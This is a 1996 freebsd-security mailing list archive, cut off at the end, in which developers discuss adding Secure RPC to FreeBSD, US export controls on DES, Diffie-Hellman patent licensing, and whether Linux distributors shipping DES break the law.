From owner-freebsd-security Sun Nov 10 17:04:22 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA03607 for security-outgoing; Sun, 10 Nov 1996 17:04:22 -0800 (PST)
Received: from tulpi.interconnect.com.au (root@tulpi.interconnect.com.au [192.189.54.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA03598 for ; Sun, 10 Nov 1996 17:04:19 -0800 (PST)
Received: (from ahill@localhost) by tulpi.interconnect.com.au id MAA12509 (8.7.6/IDA-1.6); Mon, 11 Nov 1996 12:03:13 +1100 (EST)
Date: Mon, 11 Nov 1996 12:03:12 +1100 (EST)
From: Anthony Hill
To: Jerry Kelley
cc: freebsd-security@freebsd.org
Subject: Re: Anyone have info on IP Filter build & install for FreeBSD?
In-Reply-To: <32816280.41C67EA6@iquest.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 6 Nov 1996, Jerry Kelley wrote:

> I'm looking at the IP Filter program and am wondering if anyone has got
> it up and running with FreeBSD. If so, I'd like just a few brief hints
> on the instructions from the INSTALL.xBSD file that comes with it. Are
> there any changes to this info for FreeBSD or can I just follow the
> info in there "as-is" without modification?
>
> Is there anywhere I can get more info on IP Filter? Are there any web
> pages that have some links to docs or any other info that might be of
> use?

Ran straight out of the box for me using the xBSD config.

There is a web page at http://cheops.anu.edu.au/~avalon/ which is
not completely unhelpful.

regards,
Anthony Hill
ahill@connect.com.au

From owner-freebsd-security Tue Nov 12 08:59:08 1996
From: Bill Paul
Message-Id: <199611121658.LAA22844@skynet.ctr.columbia.edu>
Subject: Secure RPC revisited
To: freebsd-security@freebsd.org
Date: Tue, 12 Nov 1996 11:58:19 -0500 (EST)

Okay, I just have to ask this.

We (that is, myself and Mark Murray, basically) held back on
incorporating Secure RPC into the base FreeBSD distribution for the
following reasons:

- Secure RPC uses DES.
- Secure RPC also uses Diffie-Hellman key exchange, which is subject
  to a patent until some time in late 1997.

Note that excluding the above two problems, Secure RPC itself is not
subject to any export restrictions since it doesn't actually encrypt
any data in RPC transactions: it encrypts only timestamps for
authentication purposes. This is how Sun and the other big vendors can
legally export their OSes out of the country. (They do not export the
actual DES support however: you need to obtain a kit for that, meaning
that while you may have Secure RPC, it may not actually work properly
until the encryption kit is installed.)

The DES problem can be dealt with (in an admittedly messy fashion) by
providing a dummy crypto library that exports a fake _des_crypt()
function. (What the fake function would do is open for debate. Anything
from simple bit inversion to rot13 is acceptable.) This would prevent
Secure RPC from working with anything besides another FreeBSD machine
until the real crypto library is installed, but unless our government
wakes up and smells the toast burning, we'll just have to deal with it.

The Diffie-Hellman issue is another matter. My understanding (which may
in fact be totally wrong) is that it's not possible to use code which
implements Diffie-Hellman without paying a licensing fee to RSA (or
whoever it is this week).
But the patent in question is supposed to expire in 1997, thus we bide
our time, all the while plotting to overthrow the earth and cackling
maniacally to ourselves. (Alright, maybe it's just me.)

But now I'm confused. Recently, the multimedia network lab decided to
buy a copy of Redhat Linux (version 3.0.3) for some project or another.
(Yes, I argued FreeBSD's case, but I was shot down. Just wait until I
rule the world: then I'll show 'em...) Anyway, I poked around in it a
bit and what did I find? Yes, you guessed it: Secure RPC support. They
even have a stripped down DES implementation just to make it work.

Now, I don't think that Redhat has separate export and domestic
versions of their CDs, so whatever they ship here, they must ship
overseas. And I'm pretty sure they're based in the US.

So could somebody please explain to me: how is it that Redhat can ship
Secure RPC support right now and we can't? Did they just do it and hope
nobody would notice (or care)? Did they pay money to RSA? Do they just
happen to know the secret handshake?

Somebody please tell me yes or no: are we allowed to ship Secure RPC
(minus DES, if necessary) with FreeBSD? (Note that suggesting that I
look at a web page somewhere does not qualify as a yes or no answer.)

I'm bringing this up again since it has direct bearing on NIS+, which
needs AUTH_DES to be at all useful. I want very much to merge AUTH_DES
support into FreeBSD so that NIS+ can basically drop right in (when I
finally finish it). This would also imply importing a dummy crypto
library. There was some talk of this back when the Secure RPC issue was
first raised, but like most things that get talked about, nothing much
ever came of it.

While I'm on the subject, I also want to add support for an AF_UNIX
socket transport. This would make it possible for processes on the same
host to communicate without using IP, thus removing the threat of IP
spoofing.
I faked up something for this in rpc.yppasswdd, but it would be nice to
have it integrated into the RPC library. Keyserv and possibly portmap
would benefit a great deal from a 'local only' transport. It would be
analogous to the loopback transport in TI-RPC on Slowlaris, but done
with AF_UNIX sockets since we don't have STREAMS/TLI.

(The TI-RPC loopback transport has what appears to be a bit of an
advantage over unix domain sockets, which is that it is possible using
t_getinfo() to determine the UID of the caller on the other end of the
link. With sockets, all you can do is set the ownership and permissions
of the socket special file in the filesystem to restrict access to
certain people, which isn't as flexible.)

So! Secure RPC integration! Legal bogosities! Discuss!

-Bill

--
=============================================================================
-Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu
Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research
Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City
=============================================================================
"If you're ever in trouble, go to the CTR. Ask for Bill. He will help you."
=============================================================================

From owner-freebsd-security Tue Nov 12 14:52:36 1996
From: Bill Paul
Message-Id: <199611122251.RAA23543@skynet.ctr.columbia.edu>
Subject: Re: Secure RPC revisited
To: freebsd-security@freebsd.org
Date: Tue, 12 Nov 1996 17:51:47 -0500 (EST)

Well, I got tired of wondering about how Redhat was able to ship Secure
RPC with their distribution, so I asked them (via the 'feedback'
selection on their web site). This is what they said:

---begin snippage:

To: wpaul@ctr.columbia.edu
Subject: Re: http://www.redhat.com/
In-reply-to: Your message of "Tue, 12 Nov 1996 19:16:32 GMT." <199611121916.TAA06823@www.redhat.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 12 Nov 1996 16:24:17 -0500
From: RHS Linux User

Thank you for your interest in Red Hat Software. The version of the RPC
that we have on our Cds is licensed on the GNU and is therefore freely
available and usable to all users.

Best Regards
Red Hat Software

----end snippage

I think he's trying to say that their code is covered by the GNU
copyleft (presumably as part of their entire 'product' which in this
case would be their Linux distribution). I don't think they can say
that, since the SunRPC code is already copyrighted by Sun Microsystems.
It also doesn't address the fact that the GNU copyleft offers no
protection whatsoever against the (admittedly stupid) US export laws
that forbid exporting DES code.

I think I'm going to try to bump this along to the next idiot in the
chain and see what they have to say about this.

-Bill

PS: Is there a non-US person around with a Redhat Linux CD-ROM set
handy? If so, can you check to see whether your version of libc has
Secure RPC and DES? (Do an 'nm /usr/lib/libc.a | grep des' and look for
'des_impl.o' which is the object that has the _des_crypt() function in
it. If you see that, then you have DES. If you have 'auth_des.o' then
you have Secure RPC.) I'm starting to wonder if maybe the Redhat people
may have put their foot in it.

--
=============================================================================
-Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu
Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research
Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City
=============================================================================
"If you're ever in trouble, go to the CTR. Ask for Bill. He will help you."
=============================================================================

From owner-freebsd-security Tue Nov 12 16:19:21 1996
From: "Gerald Quek IMO"
Date: Wed, 13 Nov 1996 08:21:49 +0800
Message-ID: <19961113001357.AAA21812@hello.contact.com.sg>

lists

From owner-freebsd-security Wed Nov 13 00:06:45 1996
From: Guido van Rooij
Message-Id: <199611130805.JAA02443@spooky.lss.cp.philips.com>
Subject: Re: Secure RPC revisited
To: wpaul@skynet.ctr.columbia.edu (Bill Paul)
Date: Wed, 13 Nov 1996 09:05:52 +0100 (MET)
Cc: freebsd-security@freebsd.org
Reply-To: Guido.vanRooij@nl.cis.philips.com
In-Reply-To: <199611121658.LAA22844@skynet.ctr.columbia.edu> from Bill Paul at "Nov 12, 96 11:58:19 am"

>
> The Diffie-Hellman issue is another matter. My understanding (which may
> in fact be totally wrong) is that it's not possible to use code which
> implements Diffie-Hellman without paying a licensing fee to RSA (or whoever
> it is this week). But the patent in question is supposed to expire in 1997,
> thus we bide our time, all the while plotting to overthrow the earth and
> cackling maniacally to ourselves. (Alright, maybe it's just me.)
>

I thought SSH also used diffie hellman. It seems they don't have a problem.
Exactly *where* is the patent living? If it is only in the states, we
might just install it on the internat repository?

-Guido

From owner-freebsd-security Wed Nov 13 12:26:20 1996
From: Bill Paul
Message-Id: <199611132024.PAA25119@skynet.ctr.columbia.edu>
Subject: Re: Re[2]: Secure RPC revisited
To: will.kempf@firstdatacorp.com (Will Kempf)
Date: Wed, 13 Nov 1996 15:24:20 -0500 (EST)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Will Kempf" at Nov 13, 96 09:33:00 am

Of all the gin joints in all the towns in all the world, Will Kempf had
to walk into mine and say:

> Is it possible (probable) that since Linus is in Finland
> (Denmark?)
> that he's using one of the internationally-available
> implementations
> of DES?

It's not a question of where Linus is or what he's using. Linus doesn't
distribute Redhat Linux (though he may use it for all I know). In fact,
Linus doesn't distribute the Linux libc implementation at all: from
what I know, he just distributes the kernel.

The point is that the Redhat people, who are based in the United States
as far as I can tell, are shipping Redhat Linux CDs from the U.S. to
places outside of the U.S. with DES encryption software on them. (I
suppose they're also making it available via FTP too. There are lots of
Redhat mirror sites around.)

The law, dumb as it is, says that you can't do that. You can actually
ship encryption code into the U.S. but once it's here, you can't ship
it back out again. Silly? You bet. But the rule applies to code which
uses more than 40 bits for its key, and DES uses 56-bit keys, so there
you have it. This is why you have export and domestic versions of
Netscape (*spit*) and why FreeBSD CDs don't come with the DES
distribution included; you have to download it separately from a nearby
FTP site (meaning if you're outside the U.S., you need to get it from a
non-U.S. FTP server).

(As an aside, I wonder if it would be possible to put the DES
distribution on a floppy and include it when Walnut Creek mails a
FreeBSD CD to someone with a U.S. mailing address.
But that's for Walnut Creek to decide.)

It would seem that other Linux distributions that use the same libc are
in the same boat: I believe Slackware has the same Secure RPC and DES
code in it. If any of these Linux distributors have mailed CDs to
overseas addresses with DES code on them, then technically they've
broken the law and could go to jail and/or be fined a lot of money.

My point is that it's just not fair that we should be going to all
this trouble to abide by the law while the Linux distributors just
thumb their noses at it.

-Bill

--
=============================================================================
-Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu
Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research
Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City
=============================================================================
"If you're ever in trouble, go to the CTR. Ask for Bill. He will help you."
=============================================================================

From owner-freebsd-security Wed Nov 13 12:44:43 1996
From: Bill Paul
Message-Id: <199611132044.PAA25158@skynet.ctr.columbia.edu>
Subject: Re: Secure RPC revisited
To: Guido.vanRooij@nl.cis.philips.com
Date: Wed, 13 Nov 1996 15:44:09 -0500 (EST)
Cc: freebsd-security@freebsd.org
In-Reply-To: <199611130805.JAA02443@spooky.lss.cp.philips.com> from "Guido van Rooij" at Nov 13, 96 09:05:52 am

Of all the gin joints in all the towns in all the world, Guido van
Rooij had to walk into mine and say:

> >
> > The Diffie-Hellman issue is another matter. My understanding (which may
> > in fact be totally wrong) is that it's not possible to use code which
> > implements Diffie-Hellman without paying a licensing fee to RSA (or whoever
> > it is this week). But the patent in question is supposed to expire in 1997,
> > thus we bide our time, all the while plotting to overthrow the earth and
> > cackling maniacally to ourselves. (Alright, maybe it's just me.)
> >
>
> I thought SSH also used diffie hellman. It seems they don't have a problem.

I'm not sure it's the same, although I wouldn't mind being proven wrong.

> Exactly *where* is the patent living? If it is only in the states, we
> might just install it on the internat repository?

The problem with Secure RPC is that it needs to be integrated with the
existing RPC library (I'm not even considering the kernel -- somebody
else can agonize over that), and the RPC library lives in libc. If we
have a separate kit for adding Secure RPC, like we currently have for
DES, we need to provide a new libc which the user has to swap for his
existing one. Replacing libc is a sticky business and I submit that
it's best to avoid forcing the user to do this.

I confess that I don't know enough about patent law to say how much of
this nonsense applies outside the U.S.

-Bill

--
=============================================================================
-Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu
Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research
Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City
=============================================================================
"If you're ever in trouble, go to the CTR. Ask for Bill. He will help you."
=============================================================================

From owner-freebsd-security Wed Nov 13 12:53:37 1996
To: Bill Paul
cc: will.kempf@firstdatacorp.com (Will Kempf), freebsd-security@freebsd.org
Subject: Re: Re[2]: Secure RPC revisited
In-reply-to: Your message of "Wed, 13 Nov 1996 15:24:20 EST." <199611132024.PAA25119@skynet.ctr.columbia.edu>
Date: Wed, 13 Nov 1996 21:53:12 +0100
Message-ID: <1712.847918392@critter.tfs.com>
From: Poul-Henning Kamp

In message <199611132024.PAA25119@skynet.ctr.columbia.edu>, Bill Paul writes:

>It would seem that other Linux distributions that use the same libc are
>in the same boat: I believe Slackware has the same Secure RPC and DES
>code in it. If any of these Linux distributors have mailed CDs to
>overseas addresses with DES code on them, then technically they've broken
>the law and could go to jail and/or be fined a lot of money.
>
>My point is that it's just not fair that we should be going to all
>this trouble to abide by the law while the Linux distributors just
>thumb their noses at it.

Well, that's one way to interpret this.

The other one is to call the DoD, who is more than eager to show how
much the damage to national safety would be, if you could export
sources for encryption tools, and who is looking for cases...

no, no, no! I didn't really mean that seriously!!!!

Then again...

--
Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox.
whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc.
Future will arrive by its own means, progress not so.

From owner-freebsd-security Wed Nov 13 13:10:45 1996
Date: Wed, 13 Nov 1996 16:08:25 -0500
From: Garrett Wollman
Message-Id: <9611132108.AA20266@halloran-eldar.lcs.mit.edu>
To: Poul-Henning Kamp
Cc: Bill Paul, will.kempf@firstdatacorp.com (Will Kempf), freebsd-security@freebsd.org
Subject: Re: Re[2]: Secure RPC revisited
In-Reply-To: <1712.847918392@critter.tfs.com>
References: <199611132024.PAA25119@skynet.ctr.columbia.edu> <1712.847918392@critter.tfs.com>

< said:

> The other one is to call the DoD, who is more than eager to show how
> much the damage to national safety would be, if you could export
> sources for encryption tools, and who is looking for cases...

DoD doesn't really care much. (The Intelligence Community doesn't much
care either...they can read anything encrypted with DES anyway.) It's
the State Department who care the most (because it's their bailiwick),
with support from the Justice Department (because they don't want
anyone to have privacy and see export controls as a way to discourage
development of all crypto software).

-GAWollman

--
Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, ANA, or NSA| - Susan Aglukark and Chad Irschick

From owner-freebsd-security Wed Nov 13 13:30:50 1996
Date: Wed, 13 Nov 1996 16:30:31 -0500 (EST)
From: Bradley Dunn
Reply-To: Bradley Dunn
To: Guido van Rooij
cc: freebsd-security@FreeBSD.ORG
Subject: Re: Secure RPC revisited
In-Reply-To: <199611130805.JAA02443@spooky.lss.cp.philips.com>

On Wed, 13 Nov 1996, Guido van Rooij wrote:

> > The Diffie-Hellman issue is another matter. My understanding (which may
> > in fact be totally wrong) is that it's not possible to use code which
> > implements Diffie-Hellman without paying a licensing fee to RSA (or whoever
> > it is this week). But the patent in question is supposed to expire in 1997,
> > thus we bide our time, all the while plotting to overthrow the earth and
> > cackling maniacally to ourselves. (Alright, maybe it's just me.)
> >
>
> I thought SSH also used diffie hellman. It seems they don't have a problem.
> Exactly *where* is the patent living? If it is only in the states, we
> might just install it on the internat repository?

This is all IMHO, and IANAL, etc, etc...in other words, don't sue me
when RSA starts banging down your door. :-)

I did a little bit of research on this when I was looking into the
possibility of a free SSL-enabled HTTP server. RSA appears to claim its
patent covers all forms of public-key cryptography and authentication.
RSA licenses its patent as follows:

-Non-commercial use is free
-Commercial users must license it for a fee.

See the agreement at:
http://www.rsa.com/rsa/contracts/PatLicAgree.html

From what I have heard, RSA, not surprisingly, defines commercial use
broadly and non-commercial use narrowly.

And speaking of SSH, I have not installed it on our (we are an ISP)
servers. I do not think we can without signing a license with RSA, or
buying someone's product based on SSH that is licensed from RSA.
We sell access to those servers for a fee, thus it could be construed
that we would be selling a service based on RSA-patented technology.

http://www.epm.ornl.gov/~dunigan/rsaref.txt may also be of use. The
section titled:

WHAT YOU CAN (AND CANNOT) DO WITH RSAREF

should be a pretty good guide on the rules covering code using
Diffie-Hellman, even if the code was written without the use of RSAref.

This only applies to the US. Outside of the US RSA's patent means
nothing. Sometimes it sucks to be an American. :(

-BD

From owner-freebsd-security Wed Nov 13 21:33:08 1996
Date: Thu, 14 Nov 1996 01:07:57 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@FreeBSD.ORG
Subject: Re: Secure RPC revisited
References: <199611121658.LAA22844@skynet.ctr.columbia.edu> <199611130805.JAA02443@spooky.lss.cp.philips.com>
In-Reply-To: <199611130805.JAA02443@spooky.lss.cp.philips.com>; from Guido van Rooij on Nov 13, 1996 09:05:52 +0100

According to Guido van Rooij:

> I thought SSH also used diffie hellman. It seems they don't have a problem.

No, SSH is not using Diffie-Hellman. Stel is [was] using it. SSH uses
its own RSA-based challenge-response scheme.

> Exactly *where* is the patent living? If it is only in the states, we
> might just install it on the internat repository?

I think -- but may be wrong -- that the patent is for the US only.
Maybe some other countries as well if only because of Berne...

--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996

From owner-freebsd-security Wed Nov 13 21:53:22 1996
To: Bill Paul
Cc: Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org
Subject: Re: Secure RPC revisited
References: <199611132044.PAA25158@skynet.ctr.columbia.edu>
From: Assar Westerlund
Date: 14 Nov 1996 06:50:44 +0100
In-Reply-To: Bill Paul's message of Wed, 13 Nov 1996 15:44:09 -0500 (EST)
Message-ID: <5ld8xhb4y3.fsf@assaris.sics.se>

Bill Paul writes:

> > I thought SSH also used diffie hellman. It seems they don't have a problem.
>
> I'm not sure it's the same, although I wouldn't mind being proven wrong.

I believe SSH uses RSA.

> > Exactly *where* is the patent living? If it is only in the states, we
> > might just install it on the internat repository?
>
> I confess that I don't know enough about patent law to say how much of
> this nonsense applies outside the U.S.

Diffie-Hellman is only patented in the US and Canada. And those
patents will expire the 27th of April 1997.

(It's unfortunately not the case that you cannot have such silly
patents outside of the US, just that the most common encryption
algorithms are not patented there.)

/asar

From owner-freebsd-security Wed Nov 13 23:04:16 1996
Date: Thu, 14 Nov 1996 18:02:24 +1100 (EST)
From: "Daniel O'Callaghan"
To: Assar Westerlund
cc: Bill Paul, Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org
Subject: Re: Secure RPC revisited
In-Reply-To: <5ld8xhb4y3.fsf@assaris.sics.se>

On 14 Nov 1996, Assar Westerlund wrote:

> Diffie-Hellman is only patented in the US and Canada. And those
> patents will expire the 27th of April 1997.
>
> (It's unfortunately not the case that you cannot have such silly
> patents outside of the US, just that the most common encryption
> algorithms are not patented there.)

The algorithms are export controlled. PKP is probably not allowed to
export the algorithm for the purposes of obtaining a patent!

Danny

From owner-freebsd-security Thu Nov 14 00:29:36 1996
To: "Daniel O'Callaghan"
Cc: Bill Paul, Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org
Subject: Re: Secure RPC revisited
From: Assar Westerlund Date: 14 Nov 1996 09:29:01 +0100 In-Reply-To: "Daniel O'Callaghan"'s message of Thu, 14 Nov 1996 18:02:24 +1100 (EST) Message-ID: <5l7mnpaxma.fsf@assaris.sics.se> Lines: 24 X-Mailer: Gnus v5.2.40/Emacs 19.34 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk "Daniel O'Callaghan" writes: > On 14 Nov 1996, Assar Westerlund wrote: > > > Diffie-Hellman is only patented in the US and Canada. And those > > patents will expire the 27th of April 1997. > > > > (It's unfortunately not the case that you cannot have such silly > > patents outside of the US, just that the most common encryption > > algorithms are not patented there.) > > THe algorithms are export controlled. PKP is probably not allowed to > export the algorithm for the purposes of obtaining a patent! Isn't it only the implementation of the algorithms as computer programs that's export controlled? I think you can send in your patent application on paper. Two other variables in the game is that in the US you can patent something that you have published some time later and that if you're unlucky the NSA says your invention is intresting and will steal it for "national security" reasons. So the "right way" is to first send in the application to EPC (European Patent Office), then to the US Patent Office, and then publish it. But I think we're getting a bit off topic... :) /assar From owner-freebsd-security Thu Nov 14 01:45:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA27020 for security-outgoing; Thu, 14 Nov 1996 01:45:55 -0800 (PST) Received: from verdi.nethelp.no (verdi.nethelp.no [193.91.212.2]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA27012 for ; Thu, 14 Nov 1996 01:45:37 -0800 (PST) 
From: sthaug@nethelp.no Received: (qmail 26413 invoked by uid 1001); 14 Nov 1996 09:44:03 +0000 (GMT) To: assar@sics.se Cc: danny@panda.hilink.com.au, wpaul@skynet.ctr.columbia.edu, Guido.vanRooij@nl.cis.philips.com, freebsd-security@freebsd.org Subject: Re: Secure RPC revisited In-Reply-To: Your message of "14 Nov 1996 09:29:01 +0100" References: <5l7mnpaxma.fsf@assaris.sics.se> X-Mailer: Mew version 1.05+ on Emacs 19.28.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 14 Nov 1996 10:44:03 +0100 Message-ID: <26411.847964643@verdi.nethelp.no> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > THe algorithms are export controlled. PKP is probably not allowed to > > export the algorithm for the purposes of obtaining a patent! > > Isn't it only the implementation of the algorithms as computer > programs that's export controlled? Yes. Bruce Schneier's book "Applied Cryptography" contains source code for a lot of different crypto algorithms. The book can be (and indeed is) freely exported from the US. The *diskette* containing the source code can *not* be exported (at least not so far - the case is continuing. See http://www.qualcomm.com/people/pkarn/export/index.html.) Steinar Haug, Nethelp consulting, sthaug@nethelp.no From owner-freebsd-security Thu Nov 14 08:07:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA01182 for security-outgoing; Thu, 14 Nov 1996 08:07:13 -0800 (PST) Received: from skynet.ctr.columbia.edu (skynet.ctr.columbia.edu [128.59.64.70]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA01077 for ; Thu, 14 Nov 1996 08:06:48 -0800 (PST) Received: (from wpaul@localhost) by skynet.ctr.columbia.edu (8.6.12/8.6.9) id LAA27259; Thu, 14 Nov 1996 11:06:13 -0500 
From: Bill Paul Message-Id: <199611141606.LAA27259@skynet.ctr.columbia.edu> Subject: Re: Secure RPC revisited To: kallio@cc.jyu.fi (Seppo Kallio) Date: Thu, 14 Nov 1996 11:06:12 -0500 (EST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Seppo Kallio" at Nov 14, 96 08:13:53 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Of all the gin joints in all the towns in all the world, Seppo Kallio had to walk into mine and say: > > Linux has also DES in passwd system. They do not have any question about > US/NonUS in install as FreeBSD has. How have they solved this? If They > have solved it somehow, why can't FreeBSD solve the problem same way? > > Seppo I don't think the Linux people 'solved' this in any way. I think they just went ahead and included the code and either weren't aware of the export laws, or they were aware of them and just hoped that nobody would notice what they were doing. -Bill -- ============================================================================= -Bill Paul (212) 854-6020 | System Manager, Master of Unix-Fu Work: wpaul@ctr.columbia.edu | Center for Telecommunications Research Home: wpaul@skynet.ctr.columbia.edu | Columbia University, New York City ============================================================================= "If you're ever in trouble, go to the CTR. Ask for Bill. He will help you." 
============================================================================= From owner-freebsd-security Thu Nov 14 09:18:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA19025 for security-outgoing; Thu, 14 Nov 1996 09:18:28 -0800 (PST) Received: from hauki.clinet.fi (root@hauki.clinet.fi [194.100.0.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA18992 for ; Thu, 14 Nov 1996 09:17:50 -0800 (PST) Received: from [194.100.45.1] (mac.metis.clinet.fi [194.100.45.1]) by hauki.clinet.fi (8.7.6/8.6.4) with SMTP id TAA10670 for ; Thu, 14 Nov 1996 19:17:17 +0200 (EET) X-Sender: pera@pop.hut.fi. Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 14 Nov 1996 19:21:50 +0200 To: freebsd-security@freebsd.org 
From: petri.riihikallio@hut.fi (Petri Riihikallio) Subject: Re: Secure RPC revisited Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >I thought SSH also used diffie hellman. It seems they don't have a problem. >Exactly *where* is the patent living? If it is only in the states, we >might just install it on the internat repository? RSA claims that their Diffie-Hellman patent covers all public key algorithms. Their patent is valid only in the U.S. and Canada, since the algorithm was published before anyone understood its commercial value. You cannot patent published inventions in Europe. SSH was developed in Finland. The free Unix version was made available by FTP. DataFellows is the Finnish company trying to commercialize SSH. They have bought a licence from PKP/RSA/RSADSI to distribute commercial versions of SSH in the U.S. and Canada. There are encryption algorithms with valid patents on both sides of the Atlantic. IDEA is one. A licence for commercial use of IDEA is expensive, and that is the reason there are so few commercial products supporting PGP. The only one I know of is ViaCrypt, and they had already bought an unlimited licence before anyone had heard of PGP. To get back to the topic. It is forbidden by the U.S. export laws to export any product with hooks for a drop-in encryption engine. That is why MS Crypto API and Apple's PowerTalk security API are not fully documented. Nobody ever tried to find out whether INT13 of MS-DOS was such a hook. There are encrypted filesystem implementations available based on it. It appears to be difficult to fully obey the U.S. law when exporting any computer product. If you ask any official opinion it is probably negative just to be on the safe side. The opposite is to try your luck. With a free product that is not reasonable. The law is at fault, but it is the most constant part of this equation. The safe way to do it is to make a public version without any dummy encryption hooks. 
Then create a patch which adds the hooks and then the additional library. The patch and the library should live outside the U.S. Yes. It is troublesome and many potential users won't do it. But that is the exact intention of the law. Petri -- Petri.Riihikallio@hut.fi From owner-freebsd-security Thu Nov 14 09:47:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA21187 for security-outgoing; Thu, 14 Nov 1996 09:47:03 -0800 (PST) Received: from gatekeeper.fsl.noaa.gov (gatekeeper.fsl.noaa.gov [137.75.131.181]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA21164 for ; Thu, 14 Nov 1996 09:46:44 -0800 (PST) Received: from cardinal.fsl.noaa.gov (daemon@cardinal.fsl.noaa.gov [137.75.60.101]) by gatekeeper.fsl.noaa.gov (8.7.5/8.7.3) with ESMTP id RAA10632; Thu, 14 Nov 1996 17:46:39 GMT Received: from auk.fsl.noaa.gov by cardinal.fsl.noaa.gov with SMTP (1.40.112.3/16.2) id AA203883598; Thu, 14 Nov 1996 17:46:39 GMT Message-Id: <328B5B03.7185@fsl.noaa.gov> Date: Thu, 14 Nov 1996 10:46:43 -0700 
From: Sean Kelly Organization: NOAA Forecast Systems Laboratory X-Mailer: Mozilla 3.0Gold (X11; I; HP-UX B.10.10 9000/725) Mime-Version: 1.0 To: Bill Paul Cc: Seppo Kallio , freebsd-security@freebsd.org Subject: Re: Secure RPC revisited References: <199611141606.LAA27259@skynet.ctr.columbia.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Bill Paul wrote: > I don't think the Linux people 'solved' this in any way. I think > they just went ahead and included the code and either weren't aware > of the export laws, or they were aware of them and just hoped that > nobody would notice what they were doing. Being surrounded by Linux bigots most of the day, information like this makes it very tempting to hinder the entire Linux effort by placing a few yet highly effective phone calls. The idea's quite sleazy, though, so I won't be doing it. -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Thu Nov 14 20:59:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA13119 for security-outgoing; Thu, 14 Nov 1996 20:59:39 -0800 (PST) Received: from ingenieria ([168.176.15.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id UAA13028 for ; Thu, 14 Nov 1996 20:59:24 -0800 (PST) Received: from unalmodem.usc.unal.edu.co by ingenieria (SMI-8.6/SMI-SVR4) id XAA12284; Thu, 14 Nov 1996 23:59:18 +0600 Message-ID: <328C221D.44A4@ingenieria.ingsala.unal.edu.co> Date: Thu, 14 Nov 1996 23:56:13 -0800 
From: "Pedro Giffuni S." Reply-To: pgiffuni@fps.biblos.unal.edu.co Organization: Universidad Nacional de Colombia X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Subject: Re: Secure RPC revisited References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Petri Riihikallio wrote: > > It appears to be difficult to fully obey the U.S. law when exporting any > computer product. If you ask any official opinion it is probably negative just > to be on the safe side. The opposite is to try your luck. With a free product > that is not reasonable. The law is at fault, but it is the most constant part > of this equation. > Well, there's another solution, you can telnet to Canada, or another part of the free world, and write your encryption there. Technically speaking you are not exporting the software, but then Walnut Creek, Netscape, IBM and the others should follow OpenBSD and move their headquarters to Canada. Is it possible to have a Blue Ribbon Campaign part II, to liberate free software from "US military masterminds"? I'm sure many US companies are having the same problem with their software and would support such a campaign. Pedro. > -- > Petri.Riihikallio@hut.fi From owner-freebsd-security Thu Nov 14 23:37:26 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id 